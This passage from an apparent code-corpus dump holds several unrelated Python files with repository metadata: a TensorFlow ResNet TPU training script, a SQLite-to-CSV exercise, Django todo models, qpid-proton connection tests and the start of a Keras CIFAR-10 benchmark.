help='Maximum seconds between checkpoints before evaluation terminates.')
flags.DEFINE_integer(
'num_parallel_calls', default=None,
help=('Number of parallel threads in CPU for the input pipeline.'
' Recommended value is the number of cores per CPU host.'))
flags.DEFINE_integer(
'num_cores', default=None,
help=('Number of TPU cores in total. For a single TPU device, this is 8'
' because each TPU has 4 chips each with 2 cores.'))
flags.DEFINE_string(
'bigtable_project', None,
'The Cloud Bigtable project. If None, --gcp_project will be used.')
flags.DEFINE_string(
'bigtable_instance', None,
'The Cloud Bigtable instance to load data from.')
flags.DEFINE_string(
'bigtable_table', 'imagenet',
'The Cloud Bigtable table to load data from.')
flags.DEFINE_string(
'bigtable_train_prefix', 'train_',
'The prefix identifying training rows.')
flags.DEFINE_string(
'bigtable_eval_prefix', 'validation_',
'The prefix identifying evaluation rows.')
flags.DEFINE_string(
'bigtable_column_family', 'tfexample',
'The column family storing TFExamples.')
flags.DEFINE_string(
'bigtable_column_qualifier', 'example',
'The column name storing TFExamples.')
flags.DEFINE_string(
'export_dir',
default=None,
help=('The directory where the exported SavedModel will be stored.'))
flags.DEFINE_bool(
'export_to_tpu', default=False,
help=('Whether to export additional metagraph with "serve, tpu" tags'
' in addition to "serve" only metagraph.'))
flags.DEFINE_float(
'base_learning_rate', default=None,
help=('Base learning rate when train batch size is 256.'))
flags.DEFINE_float(
'momentum', default=None,
help=('Momentum parameter used in the MomentumOptimizer.'))
flags.DEFINE_float(
'weight_decay', default=None,
help=('Weight decay coefficiant for l2 regularization.'))
flags.DEFINE_float(
'label_smoothing', default=None,
help=('Label smoothing parameter used in the softmax_cross_entropy'))
flags.DEFINE_bool('enable_lars',
default=None,
help=('Enable LARS optimizer for large batch training.'))
flags.DEFINE_float('poly_rate', default=None,
help=('Set LARS/Poly learning rate.'))
flags.DEFINE_bool(
'use_async_checkpointing', default=None, help=('Enable async checkpoint'))
flags.DEFINE_integer('log_step_count_steps', 64, 'The number of steps at '
'which the global step information is logged.')
flags.DEFINE_string(
'augment_name', default=None,
help='`string` that is the name of the augmentation method'
'to apply to the image. `autoaugment` if AutoAugment is to be used or'
'`randaugment` if RandAugment is to be used. If the value is `None` no'
'augmentation method will be applied applied. See autoaugment.py for '
'more details.')
flags.DEFINE_integer(
'randaug_num_layers', default=None,
help='If RandAug is used, what should the number of layers be.'
'See autoaugment.py for detailed description.')
flags.DEFINE_integer(
'randaug_magnitude', default=None,
help='If RandAug is used, what should the magnitude be. '
'See autoaugment.py for detailed description.')
# Inference configuration.
flags.DEFINE_bool(
'add_warmup_requests', False,
'Whether to add warmup requests into the export saved model dir,'
'especially for TPU inference.')
flags.DEFINE_string('model_name', 'resnet',
'Serving model name used for the model server.')
flags.DEFINE_multi_integer(
'inference_batch_sizes', [8],
'Known inference batch sizes used to warm up for each core.')
# The input tensor is in the range of [0, 255], we need to scale them to the
# range of [0, 1]
MEAN_RGB = [0.485 * 255, 0.456 * 255, 0.406 * 255]
STDDEV_RGB = [0.229 * 255, 0.224 * 255, 0.225 * 255]
losslog = []
# def get_lr_schedule(train_steps, num_train_images, train_batch_size):
# """learning rate schedule."""
# steps_per_epoch = np.floor(num_train_images / train_batch_size)
# train_epochs = train_steps / steps_per_epoch
# return [ # (multiplier, epoch to start) tuples
# (1.0, np.floor(5 / 90 * train_epochs)),
# (0.1, np.floor(30 / 90 * train_epochs)),
# (0.01, np.floor(60 / 90 * train_epochs)),
# (0.001, np.floor(80 / 90 * train_epochs))
# ]
#
#
# def learning_rate_schedule(params, current_epoch):
# """Handles linear scaling rule, gradual warmup, and LR decay.
#
# The learning rate starts at 0, then it increases linearly per step.
# After 5 epochs we reach the base learning rate (scaled to account
# for batch size).
# After 30, 60 and 80 epochs the learning rate is divided by 10.
# After 90 epochs training stops and the LR is set to 0. This ensures
# that we train for exactly 90 epochs for reproducibility.
#
# Args:
# params: Python dict containing parameters for this run.
# current_epoch: `Tensor` for current epoch.
#
# Returns:
# A scaled `Tensor` for current learning rate.
# """
# scaled_lr = params['base_learning_rate'] * (
# params['train_batch_size'] / 256.0)
#
# lr_schedule = get_lr_schedule(
# train_steps=params['train_steps'],
# num_train_images=params['num_train_images'],
# train_batch_size=params['train_batch_size'])
# decay_rate = (scaled_lr * lr_schedule[0][0] *
# current_epoch / lr_schedule[0][1])
# for mult, start_epoch in lr_schedule:
# decay_rate = tf.where(current_epoch < start_epoch,
# decay_rate, scaled_lr * mult)
# return decay_rate
def resnet_model_fn(features, labels, mode, params):
"""The model_fn for ResNet to be used with TPUEstimator.
Args:
features: `Tensor` of batched images. If transpose_input is enabled, it
is transposed to device layout and reshaped to 1D tensor.
labels: `Tensor` of labels for the data samples
mode: one of `tf.estimator.ModeKeys.{TRAIN,EVAL,PREDICT}`
params: `dict` of parameters passed to the model from the TPUEstimator,
`params['batch_size']` is always provided and should be used as the
effective batch size.
Returns:
A `TPUEstimatorSpec` for the model
"""
if isinstance(features, dict):
features = features['feature']
# In most cases, the default data format NCHW instead of NHWC should be
# used for a significant performance boost on GPU/TPU. NHWC should be used
# only if the network needs to be run on CPU since the pooling operations
# are only supported on NHWC.
if params['data_format'] == 'channels_first':
assert not params['transpose_input'] # channels_first only for GPU
features = tf.transpose(features, [0, 3, 1, 2])
if params['transpose_input'] and mode != tf.estimator.ModeKeys.PREDICT:
image_size = tf.sqrt(tf.shape(features)[0] / (3 * tf.shape(labels)[0]))
features = tf.reshape(features, [image_size, image_size, 3, -1])
features = tf.transpose(features, [3, 0, 1, 2]) # HWCN to NHWC
# Normalize the image to zero mean and unit variance.
features -= tf.constant(MEAN_RGB, shape=[1, 1, 3], dtype=features.dtype)
features /= tf.constant(STDDEV_RGB, shape=[1, 1, 3], dtype=features.dtype)
# DropBlock keep_prob for the 4 block groups of ResNet architecture.
# None means applying no DropBlock at the corresponding block group.
dropblock_keep_probs = [None] * 4
if params['dropblock_groups']:
# Scheduled keep_prob for DropBlock.
train_steps = tf.cast(params['train_steps'], tf.float32)
current_step = tf.cast(tf.train.get_global_step(), tf.float32)
current_ratio = current_step / train_steps
dropblock_keep_prob = (1 - current_ratio * (
1 - params['dropblock_keep_prob']))
# Computes DropBlock keep_prob for different block groups of ResNet.
dropblock_groups = [int(x) for x in params['dropblock_groups'].split(',')]
for block_group in dropblock_groups:
if block_group < 1 or block_group > 4:
raise ValueError(
'dropblock_groups should be a comma separated list of integers '
'between 1 and 4 (dropblcok_groups: {}).'
.format(params['dropblock_groups']))
dropblock_keep_probs[block_group - 1] = 1 - (
(1 - dropblock_keep_prob) / 4.0**(4 - block_group))
# This nested function allows us to avoid duplicating the logic which
# builds the network, for different values of --precision.
def build_network():
network = resnet_model.resnet(
resnet_depth=params['resnet_depth'],
num_classes=params['num_label_classes'],
dropblock_size=params['dropblock_size'],
dropblock_keep_probs=dropblock_keep_probs,
pre_activation=params['pre_activation'],
norm_act_layer=params['norm_act_layer'],
data_format=params['data_format'])
return network(
inputs=features, is_training=(mode == tf.estimator.ModeKeys.TRAIN))
if params['precision'] == 'bfloat16':
with tf.tpu.bfloat16_scope():
logits = build_network()
logits = tf.cast(logits, tf.float32)
elif params['precision'] == 'float32':
logits = build_network()
if mode == tf.estimator.ModeKeys.PREDICT:
predictions = {
'classes': tf.argmax(logits, axis=1),
'probabilities': tf.nn.softmax(logits, name='softmax_tensor')
}
return tf.estimator.EstimatorSpec(
mode=mode,
predictions=predictions,
export_outputs={
'classify': tf.estimator.export.PredictOutput(predictions)
})
# If necessary, in the model_fn, use params['batch_size'] instead the batch
# size flags (--train_batch_size or --eval_batch_size).
batch_size = params['batch_size'] # pylint: disable=unused-variable
# Calculate loss, which includes softmax cross entropy and L2 regularization.
one_hot_labels = tf.one_hot(labels, params['num_label_classes'])
# cross_entropy = tf.losses.softmax_cross_entropy(
# logits=logits,
# onehot_labels=one_hot_labels,
# label_smoothing=params['label_smoothing'])
cross_entropy = myWeightedLoss.softmax_cross_entropy(
logits=logits,
onehot_labels=one_hot_labels,
label_smoothing=params['label_smoothing'])
# Add weight decay to the loss for non-batch-normalization variables.
if params['enable_lars']:
loss = cross_entropy
else:
loss = cross_entropy + params['weight_decay'] * tf.add_n([
tf.nn.l2_loss(v)
for v in tf.trainable_variables()
if 'batch_normalization' not in v.name and 'evonorm' not in v.name
])
host_call = None
if mode == tf.estimator.ModeKeys.TRAIN:
# Compute the current epoch and associated learning rate from global_step.
global_step = tf.train.get_global_step()
steps_per_epoch = params['num_train_images'] / params['train_batch_size']
current_epoch = (tf.cast(global_step, tf.float32) /
steps_per_epoch)
# LARS is a large batch optimizer. LARS enables higher accuracy at batch 16K
# and larger batch sizes.
if params['enable_lars']:
onecycle_sche = onecycle.OneCycleScheduler(tf.constant(25., dtype=tf.float32), params['train_steps'])
learning_rate, momen = onecycle_sche.getlrmom(tf.cast(global_step, dtype=tf.float32))
optimizer = lars_util_onecycle.init_lars_optimizer(current_epoch, params,learning_rate)
else:
# learning_rate = learning_rate_schedule(params, current_epoch)
#for lr range test
# learning_rate = onecycle.lrs(tf.cast(global_step,tf.float32),params['train_steps'])
#for onecycle scheduler
onecycle_sche = onecycle.OneCycleScheduler(tf.constant(5.,dtype=tf.float32),params['train_steps'])
learning_rate,momen = onecycle_sche.getlrmom(tf.cast(global_step,dtype=tf.float32))
optimizer = tf.train.MomentumOptimizer(
learning_rate=learning_rate,
# momentum=params['momentum'],
momentum=momen,
use_nesterov=True)
if params['use_tpu']:
# When using TPU, wrap the optimizer with CrossShardOptimizer which
# handles synchronization details between different TPU cores. To the
# user, this should look like regular synchronous training.
optimizer = tf.tpu.CrossShardOptimizer(optimizer)
# Batch normalization requires UPDATE_OPS to be added as a dependency to
# the train operation.
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_op = optimizer.minimize(loss, global_step)
if not params['skip_host_call']:
def host_call_fn(gs, loss, lr, ce):
"""Training host call. Creates scalar summaries for training metrics.
This function is executed on the CPU and should not directly reference
any Tensors in the rest of the `model_fn`. To pass Tensors from the
model to the `metric_fn`, provide as part of the `host_call`. See
https://www.tensorflow.org/api_docs/python/tf/estimator/tpu/TPUEstimatorSpec
for more information.
Arguments should match the list of `Tensor` objects passed as the second
element in the tuple passed to `host_call`.
Args:
gs: `Tensor with shape `[batch]` for the global_step
loss: `Tensor` with shape `[batch]` for the training loss.
lr: `Tensor` with shape `[batch]` for the learning_rate.
ce: `Tensor` with shape `[batch]` for the current_epoch.
Returns:
List of summary ops to run on the CPU host.
"""
gs = gs[0]
# Host call fns are executed params['iterations_per_loop'] times after
# one TPU loop is finished, setting max_queue value to the same as
# number of iterations will make the summary writer only flush the data
# to storage once per loop.
with tf2.summary.create_file_writer(
FLAGS.model_dir,
max_queue=params['iterations_per_loop']
# max_queue=10
).as_default():
with tf2.summary.record_if(True):
# gs_unpacked = tf.unstack(gs)
# for i, g in enumerate(gs_unpacked):
# tf2.summary.scalar('loss', loss[i], step=g)
# tf2.summary.scalar('learning_rate', lr[i], step=g)
# tf2.summary.scalar('current_epoch', ce[i], step=g)
tf2.summary.scalar('loss', loss[0], step=gs)
tf2.summary.scalar('learning_rate', lr[0], step=gs)
tf2.summary.scalar('current_epoch', ce[0], step=gs)
return tf.summary.all_v2_summary_ops()
# To log the loss, current learning rate, and epoch for Tensorboard, the
# summary op needs to be run on the host CPU via host_call. host_call
# expects [batch_size, ...] Tensors, thus reshape to introduce a batch
# dimension. These Tensors are implicitly concatenated to
# [params['batch_size']].
gs_t = tf.reshape(global_step, [1])
loss_t = tf.reshape(loss, [1])
lr_t = tf.reshape(learning_rate, [1])
ce_t = tf.reshape(current_epoch, [1])
host_call = (host_call_fn, [gs_t, loss_t, lr_t, ce_t])
else:
train_op = None
eval_metrics = None
if mode == tf.estimator.ModeKeys.EVAL:
def metric_fn(labels, logits):
"""Evaluation metric function. Evaluates accuracy.
This function is executed on the CPU and should not directly reference
any Tensors in the rest of the `model_fn`. To pass Tensors from the model
to the `metric_fn`, provide as part of the `eval_metrics`. See
https://www.tensorflow.org/api_docs/python/tf/estimator/tpu/TPUEstimatorSpec
for more information.
Arguments should match the list of `Tensor` objects passed as the second
element in the tuple passed to `eval_metrics`.
Args:
labels: `Tensor` with shape `[batch]`.
logits: `Tensor` with shape `[batch, num_classes]`.
Returns:
A dict of the metrics to return from evaluation.
"""
predictions = tf.argmax(logits, axis=1)
top_1_accuracy = tf.metrics.accuracy(labels, predictions)
in_top_5 = tf.cast(tf.nn.in_top_k(logits, labels, 5), tf.float32)
top_5_accuracy = tf.metrics.mean(in_top_5)
return {
'top_1_accuracy': top_1_accuracy,
'top_5_accuracy': top_5_accuracy,
}
eval_metrics = (metric_fn, [labels, logits])
return tf.estimator.tpu.TPUEstimatorSpec(
mode=mode,
loss=loss,
train_op=train_op,
host_call=host_call,
eval_metrics=eval_metrics)
def _verify_non_empty_string(value, field_name):
"""Ensures that a given proposed field value is a non-empty string.
Args:
value: proposed value for the field.
field_name: string name of the field, e.g. `project`.
Returns:
The given value, provided that it passed the checks.
Raises:
ValueError: the value is not a string, or is a blank string.
"""
if not isinstance(value, str):
raise ValueError(
'Bigtable parameter "%s" must be a string.' % field_name)
if not value:
raise ValueError(
'Bigtable parameter "%s" must be non-empty.' % field_name)
return value
def _select_tables_from_flags():
"""Construct training and evaluation Bigtable selections from flags.
Returns:
[training_selection, evaluation_selection]
"""
project = _verify_non_empty_string(
FLAGS.bigtable_project or FLAGS.gcp_project,
'project')
instance = _verify_non_empty_string(FLAGS.bigtable_instance, 'instance')
table = _verify_non_empty_string(FLAGS.bigtable_table, 'table')
train_prefix = _verify_non_empty_string(FLAGS.bigtable_train_prefix,
'train_prefix')
eval_prefix = _verify_non_empty_string(FLAGS.bigtable_eval_prefix,
'eval_prefix')
column_family = _verify_non_empty_string(FLAGS.bigtable_column_family,
'column_family')
column_qualifier = _verify_non_empty_string(FLAGS.bigtable_column_qualifier,
'column_qualifier')
return [ # pylint: disable=g-complex-comprehension
imagenet_input.BigtableSelection(
project=project,
instance=instance,
table=table,
prefix=p,
column_family=column_family,
column_qualifier=column_qualifier)
for p in (train_prefix, eval_prefix)
]
def main(unused_argv):
params = params_dict.ParamsDict(
resnet_config.RESNET_CFG, resnet_config.RESNET_RESTRICTIONS)
params = params_dict.override_params_dict(
params, FLAGS.config_file, is_strict=True)
params = params_dict.override_params_dict(
params, FLAGS.params_override, is_strict=True)
params = flags_to_params.override_params_from_input_flags(params, FLAGS)
params.validate()
params.lock()
tpu_cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
FLAGS.tpu if (FLAGS.tpu or params.use_tpu) else '',
zone=FLAGS.tpu_zone,
project=FLAGS.gcp_project)
if params.use_async_checkpointing:
save_checkpoints_steps = None
else:
save_checkpoints_steps = max(5000, params.iterations_per_loop)
config = tf.estimator.tpu.RunConfig(
cluster=tpu_cluster_resolver,
model_dir=FLAGS.model_dir,
save_checkpoints_steps=save_checkpoints_steps,
log_step_count_steps=FLAGS.log_step_count_steps,
session_config=tf.ConfigProto(
graph_options=tf.GraphOptions(
rewrite_options=rewriter_config_pb2.RewriterConfig(
disable_meta_optimizer=True))),
tpu_config=tf.estimator.tpu.TPUConfig(
iterations_per_loop=params.iterations_per_loop,
num_shards=params.num_cores,
per_host_input_for_training=tf.estimator.tpu.InputPipelineConfig
.PER_HOST_V2)) # pylint: disable=line-too-long
resnet_classifier = tf.estimator.tpu.TPUEstimator(
use_tpu=params.use_tpu,
model_fn=resnet_model_fn,
config=config,
params=params.as_dict(),
train_batch_size=params.train_batch_size,
eval_batch_size=params.eval_batch_size,
export_to_tpu=FLAGS.export_to_tpu)
assert (params.precision == 'bfloat16' or
params.precision == 'float32'), (
'Invalid value for precision parameter; '
'must be bfloat16 or float32.')
tf.logging.info('Precision: %s', params.precision)
use_bfloat16 = params.precision == 'bfloat16'
# Input pipelines are slightly different (with regards to shuffling and
# preprocessing) between training and evaluation.
if FLAGS.bigtable_instance:
tf.logging.info('Using Bigtable dataset, table %s', FLAGS.bigtable_table)
select_train, select_eval = _select_tables_from_flags()
imagenet_train, imagenet_eval = [
imagenet_input.ImageNetBigtableInput( # pylint: disable=g-complex-comprehension
is_training=is_training,
use_bfloat16=use_bfloat16,
transpose_input=params.transpose_input,
selection=selection,
augment_name=FLAGS.augment_name,
randaug_num_layers=FLAGS.randaug_num_layers,
randaug_magnitude=FLAGS.randaug_magnitude)
for (is_training, selection) in [(True,
select_train), (False, select_eval)]
]
else:
if FLAGS.data_dir == FAKE_DATA_DIR:
tf.logging.info('Using fake dataset.')
else:
tf.logging.info('Using dataset: %s', FLAGS.data_dir)
imagenet_train, imagenet_eval = [
imagenet_input.ImageNetInput( # pylint: disable=g-complex-comprehension
is_training=is_training,
data_dir=FLAGS.data_dir,
transpose_input=params.transpose_input,
cache=params.use_cache and is_training,
image_size=params.image_size,
num_parallel_calls=params.num_parallel_calls,
include_background_label=(params.num_label_classes == 1001),
use_bfloat16=use_bfloat16,
augment_name=FLAGS.augment_name,
randaug_num_layers=FLAGS.randaug_num_layers,
randaug_magnitude=FLAGS.randaug_magnitude)
for is_training in [True, False]
]
steps_per_epoch = params.num_train_images // params.train_batch_size
eval_steps = params.num_eval_images // params.eval_batch_size
if FLAGS.mode == 'eval':
# Run evaluation when there's a new checkpoint
for ckpt in tf.train.checkpoints_iterator(
FLAGS.model_dir, timeout=FLAGS.eval_timeout):
tf.logging.info('Starting to evaluate.')
try:
start_timestamp = time.time() # This time will include compilation time
eval_results = resnet_classifier.evaluate(
input_fn=imagenet_eval.input_fn,
steps=eval_steps,
checkpoint_path=ckpt)
elapsed_time = int(time.time() - start_timestamp)
tf.logging.info('Eval results: %s. Elapsed seconds: %d',
eval_results, elapsed_time)
# Terminate eval job when final checkpoint is reached
current_step = int(os.path.basename(ckpt).split('-')[1])
if current_step >= params.train_steps:
tf.logging.info(
'Evaluation finished after training step %d', current_step)
break
except tf.errors.NotFoundError:
# Since the coordinator is on a different job than the TPU worker,
# sometimes the TPU worker does not finish initializing until long after
# the CPU job tells it to start evaluating. In this case, the checkpoint
# file could have been deleted already.
tf.logging.info(
'Checkpoint %s no longer exists, skipping checkpoint', ckpt)
else: # FLAGS.mode == 'train' or FLAGS.mode == 'train_and_eval'
try:
current_step = tf.train.load_variable(FLAGS.model_dir,
tf.GraphKeys.GLOBAL_STEP)
except (TypeError, ValueError, tf.errors.NotFoundError):
current_step = 0
steps_per_epoch = params.num_train_images // params.train_batch_size
tf.logging.info('Training for %d steps (%.2f epochs in total). Current'
' step %d.',
params.train_steps,
params.train_steps / steps_per_epoch,
current_step)
start_timestamp = time.time() # This time will include compilation time
if FLAGS.mode == 'train':
hooks = []
if params.use_async_checkpointing:
try:
from tensorflow.contrib.tpu.python.tpu import async_checkpoint # pylint: disable=g-import-not-at-top
except ImportError as e:
logging.exception(
'Async checkpointing is not supported in TensorFlow 2.x')
raise e
hooks.append(
async_checkpoint.AsyncCheckpointSaverHook(
checkpoint_dir=FLAGS.model_dir,
save_steps=max(5000, params.iterations_per_loop)))
if FLAGS.profile_every_n_steps > 0:
hooks.append(
tpu_profiler_hook.TPUProfilerHook(
save_steps=FLAGS.profile_every_n_steps,
output_dir=FLAGS.model_dir, tpu=FLAGS.tpu)
)
resnet_classifier.train(
input_fn=imagenet_train.input_fn,
max_steps=params.train_steps,
hooks=hooks)
else:
assert FLAGS.mode == 'train_and_eval'
while current_step < params.train_steps:
# Train for up to steps_per_eval number of steps.
# At the end of training, a checkpoint will be written to --model_dir.
next_checkpoint = min(current_step + FLAGS.steps_per_eval,
params.train_steps)
resnet_classifier.train(
input_fn=imagenet_train.input_fn, max_steps=next_checkpoint)
current_step = next_checkpoint
tf.logging.info('Finished training up to step %d. Elapsed seconds %d.',
next_checkpoint, int(time.time() - start_timestamp))
# Evaluate the model on the most recent model in --model_dir.
# Since evaluation happens in batches of --eval_batch_size, some images
# may be excluded modulo the batch size. As long as the batch size is
# consistent, the evaluated images are also consistent.
tf.logging.info('Starting to evaluate.')
eval_results = resnet_classifier.evaluate(
input_fn=imagenet_eval.input_fn,
steps=params.num_eval_images // params.eval_batch_size)
tf.logging.info('Eval results at step %d: %s',
next_checkpoint, eval_results)
elapsed_time = int(time.time() - start_timestamp)
tf.logging.info('Finished training up to step %d. Elapsed seconds %d.',
params.train_steps, elapsed_time)
if FLAGS.export_dir is not None:
# The guide to serve a exported TensorFlow model is at:
# https://www.tensorflow.org/serving/serving_basic
tf.logging.info('Starting to export model.')
export_path = resnet_classifier.export_saved_model(
export_dir_base=FLAGS.export_dir,
serving_input_receiver_fn=imagenet_input.image_serving_input_fn)
if FLAGS.add_warmup_requests:
inference_warmup.write_warmup_requests(
export_path,
FLAGS.model_name,
params.image_size,
batch_sizes=FLAGS.inference_batch_sizes,
image_format='JPEG')
if __name__ == '__main__':
tf.logging.set_verbosity(tf.logging.INFO)
tf.disable_v2_behavior()
app.run(main)
| 40.240994
| 111
| 0.683522
|
794e28c692faff4e7f74b6a5dd0f2cb2b30ea916
| 528
|
py
|
Python
|
Programming Languages/Python/Theory/100_Python_Exercises/Exercises/Exercise 90/90.py
|
jaswinder9051998/Resources
|
fd468af37bf24ca57555d153ee64693c018e822e
|
[
"MIT"
] | 101
|
2021-12-20T11:57:11.000Z
|
2022-03-23T09:49:13.000Z
|
Programming Languages/Python/Theory/100_Python_Exercises/Exercises/Exercise 90/90.py
|
jaswinder9051998/Resources
|
fd468af37bf24ca57555d153ee64693c018e822e
|
[
"MIT"
] | 4
|
2022-01-12T11:55:56.000Z
|
2022-02-12T04:53:33.000Z
|
Programming Languages/Python/Theory/100_Python_Exercises/Exercises/Exercise 90/90.py
|
jaswinder9051998/Resources
|
fd468af37bf24ca57555d153ee64693c018e822e
|
[
"MIT"
] | 38
|
2022-01-12T11:56:16.000Z
|
2022-03-23T10:07:52.000Z
|
#Please download the database file database.db and use Python to access the database table rows that have an area of 2,000,000 or greater. Then export those rows to a CSV file
import sqlite3
import pandas
conn = sqlite3.connect("database.db")
cur = conn.cursor()
cur.execute("SELECT * FROM countries WHERE area >= 2000000")
rows = cur.fetchall()
conn.close()
print(rows)
df = pandas.DataFrame.from_records(rows)
df.columns =["Rank", "Country", "Area", "Population"]
print(df)
df.to_csv("countries_big_area.csv", index=False)
| 31.058824
| 175
| 0.751894
|
794e28e18a2e33ce9a76e4fc75fa3ac36954d757
| 532
|
py
|
Python
|
class_based_views/django1/django1/web/models.py
|
Nikoletazl/Web-Framework
|
a04372a305797a84cdbccde13a1e47da8d551ea3
|
[
"MIT"
] | null | null | null |
class_based_views/django1/django1/web/models.py
|
Nikoletazl/Web-Framework
|
a04372a305797a84cdbccde13a1e47da8d551ea3
|
[
"MIT"
] | null | null | null |
class_based_views/django1/django1/web/models.py
|
Nikoletazl/Web-Framework
|
a04372a305797a84cdbccde13a1e47da8d551ea3
|
[
"MIT"
] | null | null | null |
from django.db import models
class Category(models.Model):
NAME_MAX_LEN = 15
name = models.CharField(
max_length=NAME_MAX_LEN,
)
def __str__(self):
return self.name
class Todo(models.Model):
TITLE_MAX_LEN = 24
title = models.CharField(
max_length=TITLE_MAX_LEN,
)
description = models.TextField()
category = models.ForeignKey(
Category,
on_delete=models.CASCADE,
)
def __str__(self):
return self.title
| 17.733333
| 37
| 0.597744
|
794e29bdd3bf64fb8d3473036f9efbc36cbf307a
| 6,271
|
py
|
Python
|
python/tests/proton_tests/connect.py
|
josusky/qpid-proton
|
122355ab5eeed05c7fe1169653387afb1c9fdd95
|
[
"Apache-2.0"
] | 1
|
2021-01-20T16:04:42.000Z
|
2021-01-20T16:04:42.000Z
|
python/tests/proton_tests/connect.py
|
francescoraves483/qpid-proton
|
3eb62f51815602c86cdf0112f1154f9e29883774
|
[
"Apache-2.0"
] | 33
|
2021-04-27T21:40:31.000Z
|
2021-06-30T17:52:17.000Z
|
python/tests/proton_tests/connect.py
|
francescoraves483/qpid-proton
|
3eb62f51815602c86cdf0112f1154f9e29883774
|
[
"Apache-2.0"
] | 2
|
2021-01-28T17:42:06.000Z
|
2021-05-14T08:08:13.000Z
|
from __future__ import absolute_import
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import time
import sys
import json
from .common import Test, SkipTest, TestServer, free_tcp_port, ensureCanTestExtendedSASL
from proton import SSLDomain
from proton.reactor import Container
from proton.handlers import MessagingHandler
from .ssl import _testpath
def write_connect_conf(obj):
with open('connect.json', 'w') as outfile:
json.dump(obj, outfile)
class Server(MessagingHandler):
def __init__(self, expected_user=None, scheme='amqps'):
super(Server, self).__init__()
self.port = free_tcp_port()
self.scheme = scheme
self.url = '%s://localhost:%i' % (self.scheme, self.port)
self.expected_user = expected_user
self.verified_user = False
def on_start(self, event):
self.listener = event.container.listen(self.url)
def on_connection_opening(self, event):
if self.expected_user:
assert event.connection.transport.user == self.expected_user
self.verified_user = True
def on_connection_closing(self, event):
event.connection.close()
self.listener.close()
class Client(MessagingHandler):
def __init__(self):
super(Client, self).__init__()
self.opened = False
def on_connection_opened(self, event):
self.opened = True
event.connection.close()
class ConnectConfigTest(Test):
def test_port(self):
ensureCanTestExtendedSASL()
server = Server()
container = Container(server)
client = Client()
write_connect_conf({'port':server.port})
container.connect(handler=client, reconnect=False)
container.run()
assert client.opened == True
def test_user(self):
ensureCanTestExtendedSASL()
user = 'user@proton'
password = 'password'
server = Server(user)
container = Container(server)
client = Client()
write_connect_conf({'port':server.port, 'user':user, 'password':password})
container.connect(handler=client, reconnect=False)
container.run()
assert client.opened == True
assert server.verified_user == True
def test_ssl(self):
ensureCanTestExtendedSASL()
server = Server(scheme='amqps')
container = Container(server)
container.ssl.server.set_credentials(_testpath('server-certificate.pem'),
_testpath('server-private-key.pem'),
'server-password')
client = Client()
config = {
'scheme':'amqps',
'port':server.port,
'tls': {
'verify': False
}
}
write_connect_conf(config)
container.connect(handler=client, reconnect=False)
container.run()
assert client.opened == True
def test_ssl_external(self):
ensureCanTestExtendedSASL()
server = Server(scheme='amqps')
container = Container(server)
container.ssl.server.set_credentials(_testpath('server-certificate-lh.pem'),
_testpath('server-private-key-lh.pem'),
'server-password')
container.ssl.server.set_trusted_ca_db(_testpath('ca-certificate.pem'))
container.ssl.server.set_peer_authentication( SSLDomain.VERIFY_PEER,
_testpath('ca-certificate.pem') )
client = Client()
config = {
'scheme':'amqps',
'port':server.port,
'sasl': {
'mechanisms': 'EXTERNAL'
},
'tls': {
'cert': _testpath('client-certificate.pem'),
'key': _testpath('client-private-key-no-password.pem'),
'ca': _testpath('ca-certificate.pem'),
'verify': True
}
}
write_connect_conf(config)
container.connect(handler=client, reconnect=False)
container.run()
assert client.opened == True
def test_ssl_plain(self):
ensureCanTestExtendedSASL()
user = 'user@proton'
password = 'password'
server = Server(expected_user=user, scheme='amqps')
container = Container(server)
container.ssl.server.set_credentials(_testpath('server-certificate-lh.pem'),
_testpath('server-private-key-lh.pem'),
'server-password')
container.ssl.server.set_trusted_ca_db(_testpath('ca-certificate.pem'))
container.ssl.server.set_peer_authentication( SSLDomain.VERIFY_PEER,
_testpath('ca-certificate.pem') )
client = Client()
config = {
'scheme':'amqps',
'port':server.port,
'user':user,
'password':password,
'sasl': {
'mechanisms': 'PLAIN'
},
'tls': {
'cert': _testpath('client-certificate.pem'),
'key': _testpath('client-private-key-no-password.pem'),
'ca': _testpath('ca-certificate.pem'),
'verify': True
}
}
write_connect_conf(config)
container.connect(handler=client, reconnect=False)
container.run()
assert client.opened == True
| 36.459302
| 88
| 0.595918
|
794e2a6ff600c50d422e4645444f728365a478d7
| 5,304
|
py
|
Python
|
keras/benchmarks/keras_examples_benchmarks/cifar10_cnn_benchmark_test.py
|
winnerineast/keras
|
1e94c43d7ba0d7b6b629b2300e40470f495bdbe0
|
[
"Apache-2.0"
] | null | null | null |
keras/benchmarks/keras_examples_benchmarks/cifar10_cnn_benchmark_test.py
|
winnerineast/keras
|
1e94c43d7ba0d7b6b629b2300e40470f495bdbe0
|
[
"Apache-2.0"
] | null | null | null |
keras/benchmarks/keras_examples_benchmarks/cifar10_cnn_benchmark_test.py
|
winnerineast/keras
|
1e94c43d7ba0d7b6b629b2300e40470f495bdbe0
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Benchmarks on CNN on cifar10 dataset."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from keras.benchmarks import benchmark_util
class Cifar10CNNBenchmark(tf.test.Benchmark):
"""Benchmarks for CNN using `tf.test.Benchmark`."""
def __init__(self):
super(Cifar10CNNBenchmark, self).__init__()
self.num_classes = 10
(self.x_train, self.y_train), _ = tf.keras.datasets.cifar10.load_data()
self.x_train = self.x_train.astype('float32') / 255
self.y_train = tf.keras.utils.to_categorical(self.y_train, self.num_classes)
self.epochs = 5
def _build_model(self):
